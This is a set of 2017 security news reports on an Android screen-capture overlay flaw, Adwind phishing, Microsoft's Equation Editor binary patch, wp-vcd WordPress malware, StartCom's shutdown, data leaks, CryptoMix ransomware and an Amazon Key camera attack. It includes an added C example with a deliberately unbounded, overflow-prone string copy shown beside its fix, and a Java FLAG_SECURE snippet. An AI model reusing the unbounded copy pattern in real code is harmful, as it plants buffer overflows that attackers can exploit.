Screen/Audio Capture Vulnerability Impacts Lion's Share of Android Devices
20.11.2017 securityweek Android
A vulnerability that allows malicious applications to capture screen contents and record audio without a user’s knowledge impacts over 78% of Android devices, researchers claim.

The issue is caused by the MediaProjection service introduced by Google in the Android Framework on Android 5.0. This service allows applications to capture the screen or record audio without special permissions, by simply requesting access via an Intent.

Prior to Android 5.0, an application would either have to run with root privileges or be signed with the device’s release keys to use system protected permissions to capture screen contents, MWR Labs security researchers explain. With the introduction of MediaProjection, no permissions are required in the AndroidManifest.xml to use the service.

When an application requires access to this system Service, a SystemUI pop-up is displayed to warn the user that the program wants to capture the screen. According to MWR, however, an attacker could overlay the SystemUI pop-up with an arbitrary message meant to trick the user into granting the malicious app the ability to capture the screen.

“This vulnerability would allow an attacker to capture the user’s screen should the user tap on the SystemUI pop-up that has been overlaid by the attacker with an arbitrary message,” the security researchers explain in a security advisory (PDF).

MWR also explains that it is difficult to determine which applications use the MediaProjection service, given that there are no permission requirements. Furthermore, the researchers claim that the vulnerability is severe because the SystemUI pop-up is launched within the context of the attacker’s application, meaning that the app can detect it and draw the overlay without the user noticing.

“The primary cause of this vulnerability is due to the fact that affected Android versions are unable to detect partially obscured SystemUI pop-ups. This allows an attacker to craft an application to draw an overlay over the SystemUI pop-up which would lead to the elevation of the application’s privileges,” the researchers argue.

Because the SystemUI pop-up is the only access control mechanism meant to prevent malicious applications from abusing the MediaProjection service, an attacker could also bypass the mechanism by tapjacking the pop-up using publicly available methods.

The vulnerability has been addressed in Android 8.0, but version fragmentation within the Android ecosystem means that a great many devices will never receive a patch and thus remain vulnerable. It’s unclear whether patches will be released for older Android versions as well, MWR says.

As of November 9, 2017, vulnerable platform releases (Android 5.0 to Android 7.1) are running on 78.7% of Android devices out there.

The good news is that the attack is not entirely undetectable: “when an application gains access to the MediaProjection service, it generates a Virtual Display which activates the screencast icon in the notification bar,” the researchers explain.

Application developers can defend against this attack by enabling the FLAG_SECURE layout parameter via the application's WindowManager. Thus, the contents of applications are treated as secure and won’t appear in screenshots.

MWR reported the issue to Google in January this year. The Internet giant assessed the vulnerability as High risk and released Android 8.0 with a patch for it, but hasn’t provided information on patches for Android 7.1.2 to 5.0 as of now, the researchers reveal.

Ongoing Adwind Phishing Campaign Discovered
20.11.2017 securityweek
A new phishing campaign delivering the Jsocket variant of Adwind (also known as AlienSpy) was detected in October, and is ongoing. Adwind and its variants have been around since at least 2012. It is a cross-platform backdoor able to install additional malware, steal information, log keystrokes, capture screenshots, take video and audio recordings, and update its own configuration.

According to Kaspersky Lab's virus definition, "it is distributed openly in the form of a paid service, where the "customer" pays a fee in return for use of the malicious program. There were around 1,800 users of the system by the end of 2015. This makes it one of the biggest malware platforms in existence today."

The current campaign was detected by KnowBe4, a security awareness firm, and reported in a blog post by CEO Stu Sjouwerman published today. KnowBe4 provides users with a phish alert button that notifies both the company's security team and KnowBe4 when a suspicious email is received.

"In early October we noticed an uptick in the number of phishing emails reported by customers that were sporting .JAR (Java) attachments -- a hallmark of Adwind," writes Sjouwerman. There is no indication of the size of this new campaign, which is unsurprising since KnowBe4's awareness comes primarily from those of its own customers that have installed its phish alert button.

However, since Adwind is sold as a service, it can at any time be delivered as a new bulk campaign or even by multiple cybercriminals using different customizations with different functionalities. In February 2016, Kaspersky Lab estimated that approximately 443,000 targets had been hit with Adwind by the end of 2015.

In July 2017, Trend Micro noted an Adwind campaign that started with 5,286 detections in January and grew to 117,649 detections in June -- with a 107% growth between May and June. If this pattern repeats, what is currently noted by KnowBe4 as "an uptick in the number of phishing emails reported by customers," could be the beginning of a major new Adwind campaign.

"All the Adwind phishes in this upsurge," comments Sjouwerman, "used Subject: lines and social engineering schemes centered on everyday business documents and related forms: invoices, purchase orders, payment instructions, contracts, and RFQs (requests for quotations)." The campaign is apparently targeting businesses rather than consumers. This is very similar to an Adwind alert issued by McAfee in December 2015, which included Subject lines such as "credit note for outstanding payment of Invoice", "PO#939423" and "Re: Payment/TR COPY-Urgent".

KnowBe4 provides two sample phishing emails. One includes the payload in a .JAR file. In this instance, Outlook blocks access to the attachment as being 'potentially unsafe'. In the second example, the payload is contained in a zip file, and is not blocked by Outlook. KnowBe4 doesn't comment on whether this difference, together with stylistic differences between the two email bodies, indicates that multiple groups are sending out Adwind phishes.

Sjouwerman is particularly concerned about the ability of anti-virus defenses to recognize and block Adwind. "Although we can say that anti-virus engine detections appear to have improved with time, they are still not at a level that would inspire confidence, with the samples we submitted [to VirusTotal] being picked up by only 16-24 engines (out of 60 total) -- roughly 26%-40% of tested engines -- even weeks after their original appearance in the wild."

He accepts that VirusTotal does not accurately reflect the true performance of an AV product. "It is worth noting," he adds, "that most endpoint anti-virus products now incorporate heuristics-driven behavioral detection capabilities that allow them to provide protection beyond their more traditional, file-focused core engines."

His concern, however, is over the extent of anti-detection capabilities built into Adwind. These include sandbox detection; detection, disabling and killing of various antivirus and security tools; TLS-protected command-and-control; and anti-reverse engineering/debugging protection.

"Many of these [antivirus] behavioral protection schemes intervene only after malicious files land on the file system and execute... And given that Adwind itself sports extremely aggressive tools to detect, thwart, and kill all manner of security tools, the best approach to handling an advanced threat like Adwind is to prevent it from being downloaded and executed in the first place."

In short, the best prevention for Adwind is the human firewall of user awareness.

KnowBe4 raised $30 million in Series B financing led by Goldman Sachs Growth Equity in October 2017.

Microsoft Manually Patched Office Component: Researchers
20.11.2017 securityweek
Microsoft engineers appear to have manually patched a 17-year-old vulnerability in Office, instead of altering the source code of the vulnerable component, ACROS Security researchers say.

Tracked as CVE-2017-11882, the vulnerability was addressed with a fixed release on November 14 as part of Microsoft’s Patch Tuesday security updates. The issue was discovered by Embedi security researchers in the Microsoft Equation Editor (EQNEDT32.EXE), a tool that had remained unchanged in the Office suite since November 9, 2000.

While analyzing the patched version of the file, the researchers from ACROS Security’s 0patch Team discovered that it was nearly identical to the original file, although the new compilation date is 2017.8.14.0.

This would not be possible if Microsoft had corrected the source code and then rebuilt the binary, since a recompiled executable would lay out its functions differently. Manually patching the binary executable, however, makes it possible, and this is what the researchers believe happened with the Equation Editor.

“Really, quite literally, some pretty skilled Microsoft employee or contractor reverse engineered our friend EQNEDT32.EXE, located the flawed code, and corrected it by manually overwriting existing instructions with better ones (making sure to only use the space previously occupied by original instructions),” Mitja Kolsek from the 0patch Team explains.

Proof of that can be easily found when comparing the original and the patched file versions. No C/C++ compiler “would put all functions in a 500+ KB executable on exactly the same address in the module after rebuilding a modified source code,” the researcher notes.

BinDiff results between the two files show that all EA primary values are identical to EA secondary values of matched functions and that even the patched functions have the same address in both EQNEDT32.EXE versions.

The vulnerability discovered by Embedi stems from the Equation Editor not checking whether the destination buffer was large enough for a user-supplied string. If the font name provided through the Equation object is long enough, it causes a buffer overflow.

An additional parameter added to the affected function now specifies the destination buffer length, and the original character-copying loop now also ends when that length is reached, preventing the overflow.

“In addition, the copied string in the destination buffer is zero-terminated after copying, in case the destination buffer length was reached (which would leave the string unterminated),” Kolsek notes.
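The copy semantics Kolsek describes, shown as an added C example (not the Equation Editor's own code, whose buffer sizes and function names are not on the page): the unbounded loop beside the bounded one that also terminates the string when the bound is hit, plus a helper that reports when the old loop would have overrun a constructed 8-byte destination.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FONT_NAME_BUF 8   /* constructed destination size; the real size is not on the page */

/* Before: the loop copies until it sees the terminator and never consults the
 * destination size, so a long font name writes past the end of dst. It returns
 * the number of bytes written (terminator included) so a caller can measure how
 * far past FONT_NAME_BUF it would have gone; only call it with a dst that is
 * large enough for src, as old_loop_overflows() does. */
size_t copy_name_unbounded(char *dst, const char *src)
{
    size_t i = 0;
    do { dst[i] = src[i]; } while (src[i++] != '\0');
    return i;
}

/* After: the extra dst_len parameter bounds the loop, and the result is always
 * terminated, which covers the case where the bound stopped the copy mid-string
 * and would otherwise have left dst without a terminator. Returns the number of
 * characters stored (terminator excluded). */
size_t copy_name_bounded(char *dst, size_t dst_len, const char *src)
{
    if (dst_len == 0) return 0;
    size_t i = 0;
    while (i < dst_len - 1 && src[i] != '\0') { dst[i] = src[i]; i++; }
    dst[i] = '\0';                               /* terminate even when the bound was reached */
    return i;
}

/* 1 when src would overrun a FONT_NAME_BUF-sized destination under the old loop. */
int old_loop_overflows(const char *src)
{
    char scratch[256];                           /* large enough for any demo input */
    if (strlen(src) >= sizeof scratch) return 1;
    return copy_name_unbounded(scratch, src) > FONT_NAME_BUF;
}

int main(void)
{
    const char *long_name = "TimesNewRomanLongName";   /* constructed over-long font name */
    char dst[FONT_NAME_BUF];
    size_t n = copy_name_bounded(dst, sizeof dst, long_name);
    printf("old loop overflows: %d, bounded copy stored %zu chars: \"%s\"\n",
           old_loop_overflows(long_name), n, dst);
    return 0;
}
```

The bounded version reserves the last byte for the terminator; a variant that copies dst_len bytes and then overwrites the final byte with zero is equivalent from the caller's point of view, which is the behaviour Kolsek describes in the patched binary.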

According to the researcher, in addition to adding said check for buffer length, the engineers who patched the function also managed to make it 14 bytes shorter. On top of that, it appears that the engineers patched other functions in the component as well, most probably because they discovered additional vulnerabilities and decided to resolve them too.

Two functions in the patched version now have boundary checks injected right before inlined memcpy operations. According to Kolsek, the engineers who patched the Equation Editor used only a single instruction (instead of two) for implementing the checks, thus leaving the code logically identical, but also freeing up space for injecting the check and for zero-terminating the copied string.

“There are six such length checks in two modified functions, and since they don't seem to be related to fixing CVE-2017-11882, we believe that Microsoft noticed some additional attack vectors that could also cause a buffer overflow and decided to proactively patch them,” the researcher points out.

Kolsek also notes that patching a software product in its binary form instead of rebuilding it from modified source code is very difficult, but that Microsoft’s engineers did a stellar job when fixing the Equation Editor. The component might be old, but it’s still required to ensure compatibility with documents that contain equations in the old format.

The only question that remains unanswered is why Microsoft chose to maintain the component in its binary form instead of altering the source code and recompiling it. Some suggest that the company might have lost the component’s source code.

We contacted Microsoft for a comment on this and will update the article as soon as we hear back.

StartCom CA to Shut Down After Ban by Browser Vendors
20.11.2017 securityweek Security
The board of directors of China-based certificate authority StartCom announced on Friday that it has decided to shut down the company following the decision of major browser vendors to ban its certificates.

StartCom is a subsidiary of WoSign, a certificate authority (CA) owned by Chinese cybersecurity firm Qihoo 360. In September 2016, Mozilla informed the community of more than a dozen incidents involving WoSign and StartCom, including misissuance of certificates and attempting to hide the fact that WoSign had acquired StartCom in November 2015.

Shortly after, WoSign started making changes to leadership, operational processes and technology. However, all the major browser vendors – Apple, Microsoft, Google and Mozilla – announced in the following months their decision to ban WoSign and StartCom certificates.

StartCom has been having problems getting re-included in certificate trust stores, which is why its board decided to shut down the company. StartCom will stop selling certificates on January 1, 2018, and it will continue to maintain its Online Certificate Status Protocol (OCSP) and Certificate Revocation List (CRL) services for another two years. In 2020, the company will eliminate its three root pairs.

“Yes, of course we will still contribute to Community and focus on security research,” said Xiaosheng Tan, chairman of StartCom’s board and CSO of Qihoo 360. “During the last ten years, the 360 security research teams have discovered hundreds of vulnerabilities in the major software companies and earned many acknowledgments in the world. Qihoo 360 and the PKI community share the same goal, which is making the internet a better place.”

As for WoSign, the company is working on getting re-included into trust stores. Earlier this year, its source code and infrastructure were analyzed by Germany-based Cure53 over a period of 40 days. The audit led to the discovery of 22 issues, but a majority of them were not actual vulnerabilities and Cure53 concluded that WoSign had made security a priority.

Mozilla will completely ban WoSign and StartCom certificates starting with Firefox 58, scheduled for release in January next year. Google did so in September with the release of Chrome 61. Microsoft also stopped trusting certificates issued by the companies after September 2017.

Experts observed a new wave of wp-vcd malware attacks targeting WordPress sites
20.11.2017 securityaffairs

Experts from the security firm Sucuri have observed a new wave of wp-vcd malware attacks targeting WordPress sites by leveraging flaws in outdated plugins and themes.
A new malware campaign is threatening WordPress installs. The malicious code, tracked as wp-vcd, hides in legitimate WordPress files and is used by attackers to add a secret admin user and gain full control over infected websites.

The malware was first spotted in July by the Italian security expert Manuel D’Orso, who noticed that the malicious code was loaded via an include call for the wp-vcd.php file and injected malicious code into WordPress core files such as functions.php and class.wp.php.

The wp-vcd malware attacks have continued, evolving over the months. Recently, researchers from Sucuri discovered a new strain of this malware that injects malicious code into the legitimate files of the two default themes, “twentyfifteen” and “twentysixteen”, included in the WordPress CMS in 2015 and 2016.

This is an old tactic that leverages theme files (active or not) to hide malicious code; in this specific case, the malware creates a new admin user named “100010010” in order to establish a backdoor into the target installation.

Hackers exploited vulnerabilities in outdated plugins and themes to upload the wp-vcd malware.

“The injection, on most of the cases we found, was related to outdated software (plugins or themes). Which a simple update or using a WAF would prevent.” reads the blog post published by Sucuri.

“Code is pretty straightforward and doesn’t hide its malicious intentions by encoding or obfuscation of functions…”

Outdated and vulnerable plugins represent a privileged entry point for hackers. Last week, the researcher Jouko Pynnönen of the Finland-based company Klikki Oy discovered several vulnerabilities in the Formidable Forms plugin that expose websites to attacks.

The Formidable Forms plugin allows users to easily create contact pages, polls and surveys, and many other kinds of forms; it has more than 200,000 active installs.

Pynnönen discovered that the dangerous flaws affect both the free and the paid version.

The most severe issue discovered by the expert is a blind SQL injection that can be exploited by attackers to enumerate a website’s databases and access their content, including user credentials and data submitted to a website via Formidable forms.

Global Cyber Alliance launched the Quad9 DNS service to secure your online experience
20.11.2017 securityaffairs Safety

Global Cyber Alliance launched the Quad9 DNS service, the free DNS service to secure your online experience and protect your privacy.
The Global Cyber Alliance (GCA) has launched the Quad9 DNS service, a new free Domain Name System resolver that checks users’ requests against IBM X-Force’s threat intelligence database.

The Quad9 DNS service not only offers the common resolution services implemented by DNS resolvers but also adds security checks to keep you from visiting one of the 40 billion malicious websites and images that X-Force has marked as dangerous.

The Global Cyber Alliance (GCA) was co-founded by a partnership of law enforcement and research organizations (City of London Police, the District Attorney of New York County and the Center for Internet Security) focused on combating systemic cyber risk in real, measurable ways.

GCA also coordinated the threat intelligence community to incorporate feeds from 18 other partners, “including Abuse.ch, the Anti-Phishing Working Group, Bambenek Consulting, F-Secure, mnemonic, 360Netlab, Hybrid Analysis GmbH, Proofpoint, RiskIQ, and ThreatSTOP.”

Back in 1988 some large /8 blocks of IPv4 addresses were assigned in whole to single organizations or related groups of organizations, either by the Internet Corporation for Assigned Names and Numbers (ICANN), through the Internet Assigned Numbers Authority (IANA), or a regional Internet registry.

Each /8 block contains 2^24 = 16,777,216 addresses, and IBM holds one such block, which allowed the company to dedicate an address from it to the project.

“IBM Security, Packet Clearing House (PCH) and The Global Cyber Alliance (GCA) today launched a free service that gives consumers and businesses added privacy and security as they access the internet. The new Quad9 Domain Name System (DNS) service protects users from accessing millions of malicious internet sites known to steal personal information, infect users with ransomware and malware, or conduct fraudulent activity.” reads the announcement published by the GCA.

According to the GCA, Quad9 has no impact on connection speed: it leverages Packet Clearing House's global infrastructure, with 70 points of presence in 40 countries.

The alliance believes that Quad9 points of presence will double over the next 18 months, further improving the speed, performance, privacy and security for users globally.

Quad9 DNS service

The organization is specifically committed to protecting users’ privacy: the Quad9 service doesn’t retain request data.

“Information about the websites consumers visit, where they live and what device they use are often captured by some DNS services and used for marketing or other purposes”, it said.

The Quad9 service aims to cover not only traditional PCs and laptops but also Internet of Things (IoT) devices such as smart thermostats and connected home appliances. These devices often do not receive important security updates and are also difficult to secure with traditional anti-virus tools, yet they remain connected to the internet, leaving them vulnerable to hackers.

Full instructions on what a DNS service does and how to switch to Quad9 can be found here.

Unprotected Pentagon Database Stored 1.8 Billion Internet Posts
20.11.2017 securityweek BigBrothers
Researchers have found an unprotected database storing 1.8 billion posts collected from social media services, news websites and forums by a contractor for the U.S. Department of Defense.

The data was discovered on September 6 by Chris Vickery, director of risk research at cyber resilience firm UpGuard, inside an AWS S3 storage bucket that was accessible to any user with an AWS account.

Based on the names of the subdomains storing it, the information appears to have been collected for the U.S. Central Command (CENTCOM) and the U.S. Pacific Command (PACOM), unified combatant commands of the Department of Defense.

The exposed records represent comments posted on news websites, forum messages, and posts from social media services such as Facebook, and they cover a wide range of topics, including sports, video games, celebrities and politics. The data had been collected between 2009 and the present day.

While some of the posts appear to be written by American citizens, many of them are in Arabic, Farsi and various dialects spoken in Pakistan and Afghanistan.

“Arabic posts criticizing or mocking ISIS, posted to Facebook pages for Iraqi anti-jihadi groups, or Pashto language comments made on the official Facebook page of Pakistani politician Imran Khan, who has drawn scrutiny from both the Taliban and the US government, give some indication of content that might be of interest to CENTCOM in its prosecution of regional wars and against Islamic extremists,” UpGuard said in a blog post.

The vast amount of information has been set up for searches via Apache Lucene, a high-performance, full-featured text search engine library.

An analysis of the data showed that it was likely collected for the Pentagon by VendorX, a now-defunct private sector contractor. While it had been in operation, the company claimed it was working on Outpost, a “multi-lingual platform designed to positively influence change in high-risk youth in unstable regions of the world.” The project was exclusively run for CENTCOM.

While the exposed data has been collected from public sources, UpGuard believes the incident raises some questions about the privacy and civil liberties impact of the U.S. government’s intelligence operations. The leak also once again highlights the risks associated with third-party vendors.

The Department of Defense has secured the leaky database. The organization told CNN that the information is not collected or processed for any intelligence purposes. A representative of CENTCOM said the data is “used for measurement and engagement activities of our online programs on public sites,” but declined to elaborate.

This is not the first time UpGuard has found an unprotected AWS S3 bucket storing data belonging to a high profile organization. In the past months, the company discovered similar leaks tied to Accenture, the U.S. Republican Party, TigerSwan, Verizon, and the U.S. military.

A bug in the Android MediaProjection service lets hackers record audio and screen activity on 77% of all devices
20.11.2017 securityaffairs Android

A flaw in the Android MediaProjection service could be exploited by an attacker to record audio and screen activity on around 77.5% of all Android devices.
A vulnerability affecting Android smartphones running Lollipop, Marshmallow, and Nougat (around 77.5% of all Android devices) could be exploited by an attacker to record audio and screen activity.

The vulnerability resides in the Android MediaProjection service, which has access to both the screen contents and the system audio.

Starting with the release of Android Lollipop (5.0), the MediaProjection service is no longer restricted to users with root access.

“To use the MediaProjection service, an application would simply have to request access to this system Service via an Intent. Access to this system Service is granted by displaying a SystemUI pop-up that warns the user that the requesting application would like to capture the user’s screen.” the MWR team wrote in a report.

The researchers explained that an attacker could overlay this SystemUI pop-up which warns the user that the contents of the screen and system audio would be captured, with an arbitrary message to trick the user into granting a malicious application the ability to capture the user’s screen.

The lack of a specific Android permission for this API makes it difficult to check whether an application uses the MediaProjection service to record video and audio. The only access control mechanism available to prevent abuse of the MediaProjection service is the SystemUI pop-up, which can be easily bypassed.

The root cause of this vulnerability is that the affected Android versions do not implement any mechanism to detect partially obscured SystemUI pop-ups.

An attacker can craft an application to draw an overlay over the SystemUI pop-up which would lead to the elevation of the application’s privileges.

“Furthermore, the SystemUI pop-up is the only access control mechanism available that prevents the abuse of the MediaProjection service. An attacker could trivially bypass this mechanism by tap-jacking this pop-up using publicly known methods to grant their applications the ability to capture the user’s screen.” added MWR.

“This vulnerability would allow an attacker to capture the user’s screen should the user tap of the SystemUI popup that has been overlayed by the attacker with an arbitrary message.”

Google patched the vulnerability only in Android Oreo (8.0); older versions are still affected by the bug.

Researchers highlighted that the attack exploiting this flaw is not entirely undetectable. When an application gains access to the MediaProjection Service, it generates a Virtual Display which activates the screencast icon in the notification bar as the following image shows:

Android MediaProjection service -screencast-icon

It is unclear whether Google plans to fix the vulnerability for the older affected versions of Android as well; for this reason users should update their devices.

MWR also provided a workaround for Android application developers, who can address the issue by setting the FLAG_SECURE layout parameter via the application’s WindowManager. This ensures that the content of the application’s windows is treated as secure, preventing it from appearing in screenshots or from being viewed on non-secure displays.
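The workaround above, written out as an added example (this is not code from the MWR report): an Activity that marks its own window secure, plus a helper for Dialogs, which have their own Window and therefore do not inherit the Activity's flag. The class, layout id and helper names are assumptions for illustration.

```java
import android.app.Activity;
import android.app.Dialog;
import android.os.Bundle;
import android.view.Window;
import android.view.WindowManager;

// Hypothetical Activity (added example) showing where FLAG_SECURE has to be set
// so that a MediaProjection session started by another app receives a blank
// region instead of this app's screen contents.
public class SecureActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // Set the flag before any content is drawn; it applies to this Window only.
        applySecureFlag(getWindow());
        setContentView(R.layout.activity_secure); // hypothetical layout id
    }

    // Dialogs (including DialogFragment-backed ones) get a separate Window,
    // so the flag must be applied to each of them as well.
    public static void secureDialog(Dialog dialog) {
        Window w = dialog.getWindow();
        if (w != null) {
            applySecureFlag(w);
        }
    }

    // Shared helper: FLAG_SECURE hides the window from screenshots, screen
    // recording and non-secure displays. It does nothing for other apps'
    // windows, so it limits the impact on this app only; it does not fix the
    // tap-jacking of the SystemUI consent pop-up itself.
    static void applySecureFlag(Window w) {
        w.setFlags(WindowManager.LayoutParams.FLAG_SECURE,
                   WindowManager.LayoutParams.FLAG_SECURE);
    }
}
```

Because the flag is per Window, a quick audit is to grep the code base for every Activity and Dialog that shows sensitive content and confirm each one reaches this helper.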

The controversial certificate authority StartCom will go out of business on January 1, 2018
20.11.2017 securityaffairs Security

The StartCom CA board chairman, Xiaosheng Tan, announced that the controversial certificate authority will end its activity on January 1, 2018.
The controversial certificate authority StartCom is going to close; according to board chairman Xiaosheng Tan, the business will end its activity on January 1, 2018.

Starting from January 1, 2018, StartCom will no longer issue new digital certificates, but the CRL and OCSP services will continue for two years, until the expiration of StartCom’s three root key pairs.

🌽🌽🌽🌽 CORN FACTS 🌽🌽🌽🌽 @SwiftOnSecurity
First reply to StartCom announcing the end of its certification business is a founding engineer glad it's dead 😳https://groups.google.com/d/msg/mozilla.dev.security.policy/LM1SpKHJ-oc/ReT-B5lgAQAJ …

9:44 PM - Nov 17, 2017

Re: Termination of the certificates business of Startcom
Posted by joachim.ba...@gmail.com, Nov 17, 2017 9:32 AM

In July, Google warned website owners that it would completely ban digital certificates issued by the Chinese certificate authority WoSign and its subsidiary StartCom. The tech giant announced it would no longer trust WoSign certificates starting with Chrome 61.
StartCom and WoSign certificates have been put on untrusted lists by almost every major browser vendor, including Mozilla, Apple, Google and Microsoft.
For this reason, according to Tan, the shutdown of the CA “would not have a major impact.”

According to w3techs.com, about 0.1 per cent of websites worldwide still use StartCom as an SSL certificate authority.

The following diagram shows the historical trend in the percentage of websites using StartCom.
StartCom CA

According to UIDAI, more than 200 government websites made Aadhaar users’ details public
20.11.2017 securityaffairs BigBrothers

According to the Unique Identification Authority of India (UIDAI), Aadhaar details were displayed on 210 government websites.
The state government websites publicly displayed personal details such as names and addresses of Aadhaar users.

The Aadhaar is the world’s largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017.

The role of the system is crucial for both authenticating and authorizing transactions and is a pillar of the Indian UID (unique identification database).

The Aadhaar issuing body confirmed that the data was removed from the websites as soon as the breach was noticed, but it did not provide further details on the alleged hack.

Even though the UIDAI never made Aadhaar details public, more than 200 websites of central government and state government departments were displaying lists of beneficiaries along with their names, addresses, other details and Aadhaar numbers.

“Though the UIDAI never made Aadhaar details public, 210 websites of central government and state government departments including educational institutes were displaying the list of beneficiaries along with their name, address, other details and Aadhaar numbers of general public.” reported the IndiaToday website.

The Aadhaar architecture has been designed to ensure the data security and privacy.

“Various policies and procedures have been defined, these are reviewed and updated continually thereby appropriately controlling and monitoring any movement of people, material and data in and out of UIDAI premises, particularly the data centres,” the UIDAI said.

The UIDAI confirmed that security audits are conducted on a regular basis to improve the security and privacy of the data, and reiterated its efforts to keep the data safe and protected.

Cash Converters suffered a data breach, users of the old webshop are at risk
19.11.2017 securityaffairs  Crime

Cash Converters suffered a data breach: its old webshop, which was withdrawn on 22 September, was hacked and attackers gained unauthorised access to customer data.
The high street pawnbroker Cash Converters, which sells small loans and second-hand jewellery, has announced that it suffered a data breach that could put some of its customers at risk.

Customers were notified of the data breach this week, on Thursday the firm sent them an email to explain what has happened.

“Along with the relevant authorities we are investigating this as a matter of urgency.” reads a statement from Cash Converters.

“We are also actively implementing measures to ensure that this cannot happen again.”

According to the company, its old online website, which was withdrawn on 22 September, was hacked and attackers gained unauthorised access to customer data from its UK e-commerce site. The current version of the e-commerce platform used by the firm is not affected.

Even if the website was not storing financial data, attackers may have accessed user records, including personal details, passwords, and purchase history from a website that was run by a third party. Cash Converters closed the contract with this third party in September.


If you have had a Cash Converters online account, change your password, including on any other websites and log-ins where the same credentials have been used.

The company has reported the data breach to authorities in the UK and Australia and is still investigating the incident.

A spokesman for the ICO confirmed it was looking into the reported breach.

“We’re aware of an incident at Cash Converters UK and will be making enquiries,” he said.

Users who receive anything suspicious can report it through Cash Converters or Action Fraud.

A second variant of the new Cryptomix Ransomware released in a few days
19.11.2017 securityaffairs 

Malware researchers at MalwareHunterTeam discovered a new variant of the CryptoMix ransomware, the second one in just a few days.
A new variant of the CryptoMix ransomware was recently discovered by the experts at MalwareHunterTeam; it is the second new variant released this week.

The latest variant appends the .0000 extension to encrypted files and uses new contact emails; for example, a test file encrypted by this variant has an encrypted file name of 0D0A516824060636C21EC8BC280FEA12.0000.

The malware researcher Lawrence Abrams explained that this latest version of the ransomware uses the same encryption methods as previously discovered variants, but he noticed some slight differences.


The ransom note maintained the same file name _HELP_INSTRUCTION.TXT, but now uses the y0000@tuta.io, y0000@protonmail.com, y0000z@yandex.com, and y0000s@yandex.com emails for a victim to contact for payment information.

This variant of the CryptoMix ransomware contains 11 public RSA-1024 encryption keys that will be used to encrypt the AES key used to encrypt the files on the victim’s PC.

“This allows the ransomware to work completely offline with no network communication. This variant’s 11 public RSA keys are the same as the previous XZZX Cryptomix Ransomware variant.” wrote Abrams.

As usual, let me suggest backing up your data and testing the backup files to avoid ugly surprises.

Install security software and keep it and every other application up to date. It could also be useful to install a specific anti-ransomware solution that implements behavioral detection.

Colleagues have published an interesting article on ransomware protection titled “How to Protect and Harden a Computer against Ransomware.”

De-authentication attack on Amazon Key could let crooks disable your camera
19.11.2017 securityaffairs  IoT

Researchers with Rhino Security Labs demonstrated how to disable the camera on Amazon Key, which could let a rogue courier access the customer’s home.
Earlier this month, Amazon announced Amazon Key for its Prime members, a program that would allow a delivery person to enter your home under video surveillance, securely drop off the package, and leave with the door locking behind them. The system could also be used to grant access to people you trust, like your family, friends, or house cleaner.

Sincerely, I don’t like this idea, but many Prime users will appreciate it for sure.

Well, these users have to know that experts from the security firm Rhino Security Labs demonstrated how easy it is to hack the Amazon Key allowing unauthorized people to access your home.

The researchers have discovered a flaw in Amazon’s Key delivery service and Cloud Cam security camera that could be exploited by a rogue courier to tamper with the camera and knock it offline, making it appear that no one is entering the home.


Homeowners can use the Amazon Key app to remotely monitor their front door via a video feed and receive Amazon delivery alerts; the same app, used by Prime customers, can also lock and unlock their door.

Experts from Rhino Labs developed an application that can forge a request from the Wi-Fi router the Cloud Cam device is connected to, instructing the camera to halt; the video feed then shows a frozen image, making it appear that the user’s front door is closed.

The experts published a video PoC of the so-called de-authentication attack. In the attack, a courier unlocks the front door using the Amazon Key app, then the attacker sends a de-authorization command to the Cloud Cam to turn off the camera.

The attack repeatedly blocks the Wi-Fi signal, causing the Amazon Key app to display a frozen image until the attackers cease the jamming.

“The camera is very much something Amazon is relying on in pitching the security of this as a safe solution,” Ben Caudill, the founder of the Seattle-based security firm Rhino Security Labs, told Wired. “Disabling that camera on command is a pretty powerful capability when you’re talking about environments where you’re relying heavily on that being a critical safety mechanism.”

Then a rogue delivery person could unlock the door and surreptitiously enter the house without being seen on the Cloud Cam feed.

“We currently notify customers if the camera is offline for an extended period… Later this week, we will deploy an update to more quickly provide notifications if the camera goes offline during delivery.” reads a statement published by Amazon.

“The service will not unlock the door if the Wi-Fi is disabled and the camera is not online.”

Amazon believes the Rhino Labs attack poses little risk to customers because it requires specific technical skills to arrange, and it also emphasizes that the root of the problem is an issue with the Wi-Fi protocol, not with Amazon Key.

While Amazon points out that every driver’s action is recorded, Rhino Labs researchers speculate that a malicious third party could follow an Amazon delivery person around to carry out the attack.

Amazon added that this type of attack is even less likely to succeed because, according to its policy, the delivery person must double-check that the door is locked after every delivery.

Kaspersky Lab – Beyond Black Friday Threat Report, November 2017
19.11.2017 Kaspersky Analysis  CyberCrime
Beyond Black Friday Threat Report 2017
The festive holiday shopping season, which covers Thanksgiving, Black Friday and Cyber Monday in late November as well as Christmas in December, now accounts for a significant share of annual sales for retailers, particularly in the U.S., Europe and APAC.

Those selling clothing, jewellery, consumer electronics, sports, hobbies and books can make around a quarter of their sales during the holiday period. In 2017, holiday sales in the U.S. alone are expected to be up by 3.6 to 4.0 per cent on the same time in 2016.

For brands looking to make the most of this annual spending spree, the desire to sell as much as possible at a time of intense competition is leading to ever more aggressive marketing campaigns – particularly online.

Promotional emails, banner ads, social media posts and more bombard consumers over the holiday months, generating a great deal of noise. Tactics such as one-click buying are designed to make the purchase process ever easier and faster. Further, up to three quarters of emails received on Black Friday and Cyber Monday are now opened on a mobile device. People are becoming used to making instant decisions – and that has significant security implications. They may miss vital signs that things are not what they seem and that their data could be at risk.

All this makes this time of year an ideal hunting ground for hackers, phishers and malware spreaders; disguising their attacks as offers too good to refuse, a concerned security message from your bank requiring urgent attention, a special rate discount from your credit card service, and more. All you have to do is enter your personal details, card numbers or bank account credentials.

Not surprisingly, messages or links designed to look as if they come from well-known, trusted brands, payment cards and banks account for many of the malicious communications detected by Kaspersky Lab’s systems in the last few years.

Methodology and Key Findings
The overview is based on information gathered by Kaspersky Lab’s heuristic anti-phishing component that activates every time a user tries to open a phishing link that has not yet been added to Kaspersky Lab’s database. Data is presented either as the number of attacks or the number of attacked users. It updates the 2016 Black Friday overview report with data covering the fourth quarter of 2016 through to 18 October, 2017.

Key Findings:
Following a decline in 2015, financial phishing abusing online payment systems, banks and retailers increased again in 2016.
Financial phishing now accounts for half (49.77 per cent) of all phishing attacks, up from 34.33 per cent in 2015.
Mobile-first consumers are likely to be a key driver behind the rise in financial phishing: the use of smartphones for online banking, payment and shopping has doubled in a year, and mobile users will have less time to think and check each action, particularly if they are out and about.
Attack levels are now fairly consistent throughout the year; and Q4 data shows they are also more evenly spread in terms of the brand names the phishers make use of.
